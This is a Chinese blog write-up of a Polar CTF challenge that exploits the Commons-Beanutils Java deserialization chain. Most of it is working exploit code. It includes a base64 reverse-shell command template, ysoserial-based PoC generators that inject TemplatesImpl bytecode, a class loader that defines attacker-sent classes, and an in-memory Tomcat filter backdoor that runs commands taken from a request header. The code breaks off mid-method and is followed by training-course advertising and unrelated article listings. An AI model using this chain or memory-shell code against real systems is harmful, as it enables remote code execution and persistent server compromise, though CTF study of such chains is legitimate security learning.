2024年网络安全最全polar CTF CB链_cb链 polar wp(1)

最新推荐文章于 2024-05-11 03:25:29 发布
最新推荐文章于 2024-05-11 03:25:29 发布
阅读量716 收藏 18
点赞数 30
分类专栏: 程序员 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77121488/article/details/138377992
版权

Runtime.getRuntime().exec(“bash -c {echo,反弹shell的payload Base64编码}|{base64,-d}|{bash,-i}”);


Payload生成类如下:

package ysoserial.poc;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;

import java.io.*;
import java.util.Base64;
import java.util.PriorityQueue;

import ysoserial.payloads.util.Reflections;

public class PoC {

public static void main(String[] args) throws Exception {

TemplatesImpl templates = getTemplate();

// mock method name until armed
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

// create queue with numbers and basic comparator
final PriorityQueue queue = new PriorityQueue(2, comparator);
// stub data for replacement later
queue.add(“1”);
queue.add(“1”);

// switch method called by comparator
Reflections.setFieldValue(comparator, “property”, “outputProperties”);

// switch contents of queue
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, “queue”);
queueArray[0] = templates;
queueArray[1] = templates;

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(queue);
byte[] bytes = byteArrayOutputStream.toByteArray();
System.out.println(Base64.getEncoder().encodeToString(bytes));
// ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
// ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
// objectInputStream.readObject();
}
public static TemplatesImpl getTemplate() throws Exception {
ClassPool classPool = ClassPool.getDefault();
CtClass clz = classPool.get(MyExec.class.getName());
TemplatesImpl obj = new TemplatesImpl();
Reflections.setFieldValue(obj, “_bytecodes”, new byte[][]{clz.toBytecode()});
Reflections.setFieldValue(obj, “_name”, “HelloTemplatesImpl”);
Reflections.setFieldValue(obj, “_tfactory”, new TransformerFactoryImpl());
return obj;
}
}


3、漏洞利用  
 攻击机监听端口:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/aae3f0921fbc4d458b7159e3a5552ba3.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f88b49b0f7d4470ab9da67be1f074881.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/4489572897b546a7b917acc52e1c2d1c.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/dbffe678d4284a7faaedfc7ff9262467.png)  
 **这种传统方法这道题不好用**  
 下面才是真正的解题步骤<------------------------------------------------------------------------------------------------`这才是开始`  
 1、不出网利用(动态类加载)首先需要简单改造一下ysoserial定义一个类加载器:

package ysoserial;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.util.Base64;

public class MyClassLoader extends AbstractTranslet {
static{
try{
javax.servlet.http.HttpServletRequest request = ((org.springframework.web.context.request.ServletRequestAttributes)org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest();
java.lang.reflect.Field r=request.getClass().getDeclaredField(“request”);
r.setAccessible(true);
org.apache.catalina.connector.Response response =((org.apache.catalina.connector.Request) r.get(request)).getResponse();
javax.servlet.http.HttpSession session = request.getSession();

String classData=request.getParameter(“classData”);
System.out.println(“classData:”+classData);

byte[] classBytes = Base64.getDecoder().decode(classData);
java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(“defineClass”,new Class[]{byte[].class, int.class, int.class});
defineClassMethod.setAccessible(true);
Class cc = (Class) defineClassMethod.invoke(MyClassLoader.class.getClassLoader(), classBytes, 0,classBytes.length);
cc.newInstance().equals(new Object[]{request,response,session});
}catch(Exception e){
e.printStackTrace();
}
}
public void transform(DOM arg0, SerializationHandler[] arg1) throws TransletException {
}
public void transform(DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {
}
}


然后在ysoserial.payloads.util包的Gadgets类中照着原有的createTemplatesImpl方法添加一个createTemplatesImpl(Class c),参数即为我们要让服务端加载的类,如下直接将传入的c转换为字节码赋值给了\_bytecodes

public static T createTemplatesImpl(Class c) throws Exception {
Class tplClass = null;

if ( Boolean.parseBoolean(System.getProperty(“properXalan”, “false”)) ) {
tplClass = (Class) Class.forName(“org.apache.xalan.xsltc.trax.TemplatesImpl”);
}else{
tplClass = (Class) TemplatesImpl.class;
}

final T templates = tplClass.newInstance();
final byte[] classBytes = ClassFiles.classAsBytes©;

Reflections.setFieldValue(templates, “_bytecodes”, new byte[][] {
classBytes
});

Reflections.setFieldValue(templates, “_name”, “Pwnr”);
return templates;
}


以CB链为例写一个POC

package ysoserial.poc;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;

import java.io.*;
import java.util.Base64;
import java.util.PriorityQueue;

import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.Reflections;

public class PoC {

public static void main(String[] args) throws Exception {

final TemplatesImpl templates = Gadgets.createTemplatesImpl(ysoserial.MyClassLoader.class);
//final TemplatesImpl templates = Gadgets.createTemplatesImpl(ysoserial.poc.Exp.class);
//final TemplatesImpl templates = getTemplate();

// mock method name until armed
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

// create queue with numbers and basic comparator
final PriorityQueue queue = new PriorityQueue(2, comparator);
// stub data for replacement later
queue.add(“1”);
queue.add(“1”);

// switch method called by comparator
Reflections.setFieldValue(comparator, “property”, “outputProperties”);

// switch contents of queue
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, “queue”);
queueArray[0] = templates;
queueArray[1] = templates;

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(queue);

byte[] bytes = byteArrayOutputStream.toByteArray();

System.out.println(Base64.getEncoder().encodeToString(bytes));

ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
objectInputStream.readObject();
}
// public static TemplatesImpl getTemplate() throws Exception {
//
// ClassPool classPool = ClassPool.getDefault();
// CtClass clz = classPool.get(Tomcat_Echo_inject_Filter.class.getName());
//
// TemplatesImpl obj = new TemplatesImpl();
// Reflections.setFieldValue(obj, “_bytecodes”, new byte[][]{clz.toBytecode()});
// Reflections.setFieldValue(obj, “_name”, “HelloTemplatesImpl”);
// Reflections.setFieldValue(obj, “_tfactory”, new TransformerFactoryImpl());
//
// return obj;
// }
}


接下来即可写一个恶意类,该类可应用于不出网情景,可将简单的命令执行回显在response的Header中,


为了方便注册filter,我直接让该类实现了Filter接口,在doFilter方法中完成Exp的主要逻辑,在equals方法中进行filter的动态注册

package ysoserial.poc;

import javax.servlet.*;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.stream.Collectors;

public class Exp implements javax.servlet.Filter{
private javax.servlet.http.HttpServletRequest request = null;
private org.apache.catalina.connector.Response response = null;
private javax.servlet.http.HttpSession session =null;

@Override
public void init(FilterConfig filterConfig) throws ServletException {
}
public void destroy() {}
@Override
public void doFilter(ServletRequest request1, ServletResponse response1, FilterChain filterChain) throws IOException, ServletException {
javax.servlet.http.HttpServletRequest request = (javax.servlet.http.HttpServletRequest)request1;
javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse)response1;
javax.servlet.http.HttpSession session = request.getSession();
String cmd = request.getHeader(“Polar-CMD”);
System.out.println(cmd);
if (cmd != null) {
//System.out.println(“1”);
response.setHeader(“Polar-START”, “OK”);
// 使用 ProcessBuilder 执行命令
Process process = new ProcessBuilder(cmd.split(“\s+”))
.redirectErrorStream(true)
.start();
//System.out.println(“2”);
// 获取命令执行的输入流
InputStream inputStream = process.getInputStream();

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

师从阳
关注
  • 30
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Polar Code_bec_polar编码_polarsc_polarcodeSC译码_polar_
09-29
**Polar码是一种创新的前向纠错编码技术,由土耳其科学家Erdal Arıkan于2009提出。这种编码方式利用信道极化现象,能够在理论上实现香农容量,即在无错误传输信息的极限。Polar码特别适用于5G通信和其他高速、低...
JAVA获取视频缩略图
02-05
超简单 获取视频缩略图。
IDEA常用插件(30个)
大道至简
06-20 1万+
Database Navigator:提供了数据库连接和管理功能,可以直接在 IDE 中进行 SQL 开发。Docker Integration:提供了 Docker 容器的支持,可以在 IDE 中管理和调试容器。.ignore:提供了许多文件和目录忽略模板,可以帮助你在项目中快速创建 .gitignore 文件。CheckStyle-IDEA:提供了 CheckStyle 的支持,可以帮助你保持代码质量。SonarLint:提供了 SonarLint 的支持,可以帮助你在代码中发现潜在的问题。
Web漏洞-XSS平台简介-相关知识点补充(cookie与session)
ran的博客
03-14 1944
首页(注册)。成功注册后的主页。按照如下路径填写相关信息后点击下一步。之后会返回项目相关的功能。勾选默认模块后点击下一步。点击下一步后,平台会为你创建一个项目。下滑后可以看到平台生成的测试语句。这里我们引用平台生成的最后一条语句。输入网站内的对应位置后点击提交。可以看到成功提交了。来到管理员界面可以看到查看留言的位置。点击进入查看后便发现网站弹出了一个弹窗,说明网站成功执行了js代码。
2024最全polar CTF CB_cb polar wp,完美收官
最新发布
2401_84301389的博客
05-11 718
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~// 获取命令执行的输入流。还有大家最喜欢的黑客技术。
Ubuntu和windows系统下安装odoo17 社区版和企业版
u010991031的博客
11-14 1万+
6.要部署企业版的,就去路径/usr/lib/python3/dist-packages 把里面的odoo文件夹改名,或者删除,然后把企业版源码(需要可以联系walle-168)粘贴进去,重启odoo服务或者重启服务器,然后退出社区版登录,点管理数据库新建数据库就是企业版的了,也可以直接http://ip:8069/web/database/manager直接新建数据库。其他的很多功能也有不错的亮点,比如筛选框、冻结表头等,最后在技术层面也是做了不少的优化,大大提高启动速度,日常应用响应速度。
IDEA常用插件介绍
宇智波小强的博客
07-17 1万+
IDEA常用插件介绍!
IDEA - 最全实用插件与使用
MinggeQingchun的博客
06-04 4880
日晒主题本身是为vim定制的。后来移植到ide 非常酷!配色非常耐看​idea设置黑色经典样式Darcula:idea设置黑色经典样式Darcula。
polar代码MATLAB (1).rar_Matlab代码_Polar码_polar_polar coding_sc译码
07-14
Polar码是一种新兴的前向纠错编码(Forward Error Correction,FEC)技术,由土耳其科学家艾尔达尔·阿里坎在2008提出。它利用信道极化效应,能够在理论上实现接近香农限的编码效率,尤其适用于低信噪比环境下的...
polar_matlabpolar_matlab_polarcode_Polar_matlab_polar_源码
10-02
在 MATLAB 环境中,Polar 代码是一种用于信道编码的重要技术,它由艾里·阿龙森(Eli Arikan)于2009提出。Polar 代码利用信道极化现象,使得信息能够在经过编码后通过信道传输时,能够达到接近香农极限的错误纠正...
polar code源码.zip_Polar码_polar_polar code_polar matlab_polar源码
07-14
Polar码是一种新兴的前向纠错编码(Forward Error Correction,FEC)技术,由土耳其科学家艾尔达尔·阿里坎(Erdal Arıkan)在2008提出。这种编码方法基于信道极化理论,能够在信道容量接近Shannon极限的情况下...
POLAR.rar_polar_polar code_polar code matl_polar codes matlab_po
07-14
【标题】"POLAR.rar_polar_polar code_polar code matl_polar codes matlab_po" 指向的是一款在MATLAB环境下实现的极化码(Polar Code)程序。极化码是一种创新的纠错编码技术,由土耳其科学家Erdal Arikan在2009...
java利用ffmpeg获取视频缩略图
11-12
这是一个java利用ffmpeg获取视频缩略图的java工程,里面有什么都有了,你只需要导入你的myeclpise,然后运行,看效果就是了,总共就一个类,二十多行代码
httpx是一种快速且多功能的HTTP工具包,允许使用retryablehttp库运行多个探测器-Golang开发
05-26
httpx是一种快速且多功能的HTTP工具包,允许使用retryablehttp库运行多个探测器,它旨在通过增加线程数来保持结果的可靠性。 httpx是一种快速且多功能的HTTP工具包,允许使用retryablehttp库运行多个探测器,它旨在通过增加线程数来保持结果的可靠性。 资源资源功能用法安装说明从二进制文件从源文件运行httpX到探针7614主机使用stdin运行httpx并使用文件输入运行httpx并使用CIDR输入运行httpx并使用带有subfinder / chaos和任何其他类似工具的httpx。 运行带有json输出的httpX Todo谢谢
MP3STEGO.zip
09-16
  mp3stego是一个MP3隐写工具,隐写就是在把WMA压缩转换成MP3的过程中,对要隐藏的文本txt文件进行加密并写入MP3。有需要的可以下载来使用。
odoo17基础培训1-odoo开发基础知识准备以及odoo17开发环境安装
jiafeitutu的博客
01-12 4646
odoo17基础培训1-odoo开发基础知识准备以及odoo17开发环境安装
odoo17开发入门教程(2):创建一个新的模块module
03-10 1203
使用docker安装开发环境,再之前的文章中已经讲过了。下面正式进入odoo的开发之旅。本章的目的是为创建一个全新的Odoo模块奠定基础。我们将从头开始,以最小的需求让我们的模块被Odoo识别。在接下来的章节中,我们将逐步添加功能,构建一个现实的商业案例。
Nessus详细安装-windows (保姆级教程)
热门推荐
m0_52985087的博客
12-23 1万+
将license全部复制包括前面的-----BEGIN TENABLE LICENSE-----和最后的-----END TENABLE LICENSE----- 否则会提=提示错误。大家可以自行研究怎么扫描,可以先扫描自己的本地主机试试,我试了简单的一般20-30分钟,还可以将扫描的信息导出为pdf,非常nice。Nessus 提供了丰富的报告功能,可以生成详细的漏洞报告和安全建议,帮助管理员和安全团队理解并解决系统中存在的安全问题。在上述11步的时候提到的下载插件的地址,需要提前下载。
polar rect_to_polar(rect xypos)
04-27
def rect_to_polar(xypos): x, y = xypos r = math.sqrt(x**2 + y**2) theta = math.atan2(y, x) return (r, theta) ``` 其中,`xypos` 是一个包含两个元素的元组,表示直角坐标系下的坐标。函数返回一个包含两...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值